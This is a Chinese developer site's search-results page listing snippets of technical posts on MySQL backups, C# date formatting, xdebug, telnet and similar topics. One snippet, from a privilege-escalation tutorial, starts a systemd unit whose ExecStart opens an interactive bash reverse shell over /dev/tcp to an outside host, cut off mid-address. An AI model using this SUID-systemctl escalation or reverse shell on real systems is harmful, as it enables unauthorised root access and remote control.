码迷,mamicode.com
首页 >  
搜索关键字:start    ( 26183个结果
mysql容器定时备份数据
#!/usr/bin/env python # encoding: utf-8 import datetime import os import shutil import subprocess import time import zipfile # 数据库用户名 db_user = "root" ...
分类:数据库   时间:2021-06-02 11:05:03    阅读次数:0
C# 日期格式化显示
日期显示代码如下: 1 // <summary> 2 /// 日期时间显示改变 3 /// </summary> 4 private void InitDateTimePickerUp() 5 { 6 //开始时间 7 this.dateTimePicker_start.CustomFormat = ...
分类:Windows程序   时间:2021-06-02 10:53:58    阅读次数:0
记录一次polkitd的报错(只解决了其他服务能正常使用systemctl)
事发缘由:因三级等保、需要将centos7系统中的”高危”用户进行封禁或者注释,用户有: dademon、adm、lp、shutdown、halt、mail、operator、gamesftp、nobody、system-network、polkitd、dbus、postfix,其中polktd、d ...
分类:其他好文   时间:2021-06-02 10:30:31    阅读次数:0
Convert FSE2 - Financial Statement Maintenance to Current Settings
Skip to end of metadata Go to start of metadata The procedure to convert FSE2 from an IMG activity to a user transaction/current setting is outlined i ...
分类:其他好文   时间:2021-05-25 18:34:50    阅读次数:0
xdebug开启调试
xdebug 2.8 (貌似3.0以下都可以) [xdebug]xdebug.remote_enable=1xdebug.remote_host=host.docker.internalxdebug.remote_port=9000xdebug.remote_handler=dbgpxdebug.r ...
分类:其他好文   时间:2021-05-25 18:12:24    阅读次数:0
mysql配置同步复制报错“The server is not configured as slave”
在给2台mysql数据库配置主从同步,配置完成后,在slave上执行“start slave;”报错,提示:ERROR 1200 (HY000): The server is not configured as slave; fix in config file or with CHANGE MAS ...
分类:数据库   时间:2021-05-24 17:15:05    阅读次数:0
mysql8.0安装
安装教程: https://www.cnblogs.com/laumians-notes/p/9069498.html https://blog.csdn.net/weixin_42869365/article/details/83472466 启动 net start mysql 登录 (1234 ...
分类:数据库   时间:2021-05-24 16:08:31    阅读次数:0
CENTOS 7 telnet 服务安装
开篇废话 telnet 很重要,当升级ssh失败时,无法通过ssh连接服务器时需要用 telnet 连接。 1 ssh -V 查询当前版本 openssl version 2 安装telnet-server yum install xinetd telnet-server -y 2.1 离线安装? ...
分类:Web程序   时间:2021-05-24 16:05:20    阅读次数:0
wpf 富文本编辑器richtextbox的简单用法
最近弄得一个小软件,需要用到富文本编辑器,richtextbox,一开始以为是和文本框一样的用法,但是实践起来碰壁之后才知道并不简单。 richtextbox 类似于Word,是一个可编辑的控件。结构图(来自网络) 我的主要用途是用来支持一个基于C#的考试系统,由于考试科目涉及到图片以及还有复杂的数 ...
分类:Windows程序   时间:2021-05-24 15:13:30    阅读次数:0
suid-systemctl提权
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:其他好文   时间:2021-05-24 14:55:34    阅读次数:0
26183条   上一页 1 ... 12 13 14 15 16 ... 2619 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!